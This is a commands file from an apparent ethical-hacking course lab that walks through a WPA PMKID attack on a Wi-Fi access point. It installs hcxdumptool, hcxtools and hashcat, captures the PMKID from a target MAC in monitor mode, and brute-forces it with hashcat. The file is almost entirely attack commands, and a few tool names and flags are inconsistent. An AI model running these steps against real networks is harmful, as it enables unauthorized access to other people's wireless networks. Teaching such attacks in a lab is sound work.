Files
Ubalt/EthicalHacking/Labs/wirelessHacking/WirelessUsingPMKID/commands.txt
Frank Xu 5224433c78 backdoor
2018-11-27 10:58:06 -05:00

49 lines
1.2 KiB
Plaintext

apt-get update
apt-get dist-upgrade -y
apt-get install libssl-dev
apt-get install libz-dev
apt-get install libpcap-dev -y
apt-get install libcurl4-openssl-dev
git clone https://github.com/ZerBea/hcxdumptool
cd hcxdumptool
make
make install
hcxdumptool -h
hcxdumptool --version
git clone https://github.com/ZerBea/hcxtools.git
cd hcxtools
make
make install
hcxpcptool -h
hcxpcptool -v
hashcat -h
hashcat --version
mkdir crack_PMKID
cd crack_PMKID
airmon-ng start wlan0
airodump-ng wlan0mon
echo '<AP mac address without :' > mac.txt /
cat mac.txt
hcxdumptool -o hash -i wlan0mon --filterlist=mac.txt --filtermode=2 --enable_status=3
hcxpcaptool -z hashtocrack hash
cat hashtocrack
hashcat -m 16800 hashtocrack -a 3 -w 3 abcdef?l?l --force --potfile-disable
//-a -3 : attack model: brute-force
//-w 3: -workload-profile: high performance
// potfile: the potfile stores which hashes were already cracked, and thus won't be cracked again.
1: hcxdumptool v4.2.0 or higher: https://github.com/ZerBea/hcxdumptool
2: hcxtools v4.2.0 or higher: https://github.com/ZerBea/hcxtools
3: hashcat v4.2.0 or higher: https://github.com/hashcat/hashcat
Tutorial
https://www.youtube.com/watch?v=DarsUXcHTSU